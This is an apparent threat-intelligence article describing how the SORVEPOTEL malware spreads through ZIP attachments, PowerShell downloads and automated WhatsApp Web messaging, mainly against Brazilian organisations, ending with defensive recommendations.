SORVEPOTEL Malware

A fast-moving malware campaign named SORVEPOTEL is actively exploiting the trust people place in WhatsApp to propagate itself across Windows environments. Unlike many modern attacks built for data theft or ransomware, this campaign is optimized for speedy, large-scale spread — which makes it particularly dangerous in enterprise contexts where a single compromised desktop can seed many more infections.

What Is SORVEPOTEL

SORVEPOTEL is a self‑propagating Windows malware family that leverages social engineering and the desktop/web version of WhatsApp to distribute malicious attachments to a victim’s contacts and groups. Its primary objective appears to be rapid dissemination and account abuse (resulting in spam and account bans), not immediate data exfiltration or file encryption.

How Victims Are Lured

Attackers begin from a compromised WhatsApp contact or, in some cases, with a seemingly legitimate email. The message contains a ZIP file disguised as an innocuous item (for example, a receipt or health-app file). If the recipient opens the ZIP on a desktop, the following steps typically occur:

• The victim is tricked into launching a Windows shortcut (LNK) inside the archive.
• The LNK silently runs a PowerShell command which downloads the next-stage payload from an external host (an identified example is sorvetenopoate.com).

The retrieved payload is a batch script that establishes persistence and executes further commands.

Execution Details And Persistence Mechanisms

Once installed, the batch script copies itself into the Windows Startup folder so it will run automatically after system boot. It also invokes PowerShell to contact a Command‑and‑Control (C2) server for follow‑up instructions or to fetch additional components. These behaviors enable the malware to remain resident and to accept remote commands from the operators.

WhatsApp As The Propagation Engine

A core feature of SORVEPOTEL is its WhatsApp-aware spreading routine. If the malware detects that WhatsApp Web (the desktop/web client) is active on the infected machine, it automates the distribution of the same malicious ZIP to:

• All contacts linked to the compromised account, and
• All groups the account belongs to.

This automated distribution produces a very high volume of outbound spam, which often triggers WhatsApp’s abuse detection and leads to suspended or banned accounts.

Scope And Who’s Been Hit

The campaign so far is heavily concentrated in Brazil: 457 of 477 recorded infections originated there. Targeted organizations span several sectors, notably:

• government and public services
• manufacturing
• technology
• education
• construction

Notably, the operators do not appear to have used gained access for mass data theft or to deploy ransomware; the observable outcome has been aggressive propagation and account abuse.

Additional Distribution Vectors Observed

Although WhatsApp-based messages are the primary propagation route, analysts have found evidence that attackers also distribute the same malicious ZIP attachments via email, sometimes using apparently legitimate sender addresses to increase credibility.

Why This Campaign Is Notable

SORVEPOTEL illustrates a trend where attackers exploit mainstream communication platforms to multiply reach with minimal user interaction. By weaponizing a trusted contact and the convenience of WhatsApp Web, the malware achieves rapid lateral propagation across organizations without needing sophisticated data-theft components.

Closing Note

SORVEPOTEL is a reminder that social platforms are attractive propagation channels for malware. Rapid detection, user education, and controls that limit script execution and monitor messaging clients on desktops will materially reduce the attack surface this campaign exploits.